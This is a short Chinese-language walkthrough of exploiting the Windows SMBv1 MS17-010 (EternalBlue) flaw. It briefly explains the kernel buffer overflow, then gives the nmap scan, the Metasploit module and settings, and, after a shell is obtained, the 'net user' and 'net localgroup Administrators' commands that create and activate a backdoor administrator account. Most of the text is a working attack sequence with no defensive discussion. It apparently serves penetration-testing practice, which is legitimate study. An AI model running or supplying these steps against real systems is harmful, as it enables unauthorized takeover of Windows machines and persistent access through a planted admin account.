利用namap --script=vuln +ip 发现靶机存在ms17-010漏洞
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
使用msfconsole扫描模块看该漏洞是否可以利用命令如下
发现可以漏洞利用
使用语句:
use exploit/windows/smb/ms17_010_eternalblue
show options
注意要配置目标ip,若LHOST未配置的话还需继续配置
set RHOSTS 192.168.0.2
直接run
已经漏洞利用成功
使用getuid(获取用户识别码)
在利用shell命令
做提权操作:
1.创建新用户
cd\ 进入根目录
输入net user admin lovechina /add
(这里的admin可以任意)
2.输入net localgroup Administrators admin /add,将我们建立的admin用户加入管理员组去。
可以看到已经添加成功,但是因为这个账号还没有激活,所以还是无法使用的。输入net user admin /active:yes。激活我们新建的账号,到这里建立账号和提权都完成了。现在重启电脑后既可。